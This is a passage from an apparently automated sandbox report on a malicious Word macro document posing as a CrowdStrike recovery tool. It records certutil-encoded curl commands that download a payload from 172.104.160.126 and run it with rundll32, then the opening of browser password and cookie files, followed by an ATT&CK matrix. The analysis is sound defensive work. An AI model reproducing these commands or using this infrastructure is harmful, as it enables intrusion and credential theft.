w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00
Source: document.xmlBinary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_008B155B
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,13_2_0087D33A
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B0CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_008B0CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_008B155B
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B16BE SetUnhandledExceptionFilter,13_2_008B16BE
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C91410 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFD92C91410
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C09FB0 SetUnhandledExceptionFilter,16_2_00007FFD92C09FB0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C09D50 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFD92C09D50
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C08970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFD92C08970
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00880CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00880CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0088155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0088155B
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_008816BE SetUnhandledExceptionFilter,33_2_008816BE

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.104.160.126 5000
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, VBA stomping: true
Source: ~WRC0000.tmp.26.drOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B137A cpuid 13_2_008B137A
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,16_2_00007FFD92CD7430
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,__vcrt_getptd,GetLcidFromDefault,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00007FFD92CD76C0
Source: C:\Windows\System32\rundll32.exeCode function: __crt_fast_encode_pointer,EnumSystemLocalesW,16_2_00007FFD92CBDD50
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,EnumSystemLocalesW,16_2_00007FFD92CD6AA0
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoEx,FormatMessageA,16_2_00007FFD92C0AAC0
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,EnumSystemLocalesW,16_2_00007FFD92CD6B70
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,16_2_00007FFD92CBEB80
Source: C:\Windows\System32\rundll32.exeCode function: __vcrt_getptd,EnumSystemLocalesW,16_2_00007FFD92CD6C80
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\result.txt VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B1775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_008B1775
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CC8F40 _invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,GetTimeZoneInformation,16_2_00007FFD92CC8F40
Source: C:\Windows\SysWOW64\certutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\rundll32.exeCode function: \Google\Chrome\User Data\Default\Login Data16_2_00007FFD92BE1290
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0089A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008A699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,13_2_008A699F
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_00898490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,13_2_00898490
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,13_2_0087DEDF
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C496B0 _mbsset_s,_mbsset_s,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3DF49 bind,WSAGetLastError,16_2_00007FFD92C3DF49
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C37F90 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,16_2_00007FFD92C37F90
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C543E0 htons,_mbsset_s,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,16_2_00007FFD92C543E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3E1E0 bind,WSAGetLastError,16_2_00007FFD92C3E1E0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0086A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,33_2_0087699F
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00868490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,33_2_00868490
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,33_2_0084DEDF
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid Accounts1
Windows Management Instrumentation
32
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
2
OS Credential Dumping
2
System Time Discovery
1
Exploitation of Remote Services
12
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts1
Native API
1
Obfuscated Files or Information
1
Extra Window Memory Injection
1
Deobfuscate/Decode Files or Information
1
Credentials In Files
3
File and Directory Discovery
Remote Desktop Protocol1
Data from Local System
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
111
Process Injection
12
Obfuscated Files or Information
Security Account Manager36
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
Command and Scripting Interpreter
Login HookLogin Hook1
DLL Side-Loading
NTDS11
Security Software Discovery
Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets1
Virtualization/Sandbox Evasion
SSHKeylogging5
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain Credentials2
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading
DCSync1
System Network Configuration Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Rundll32
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
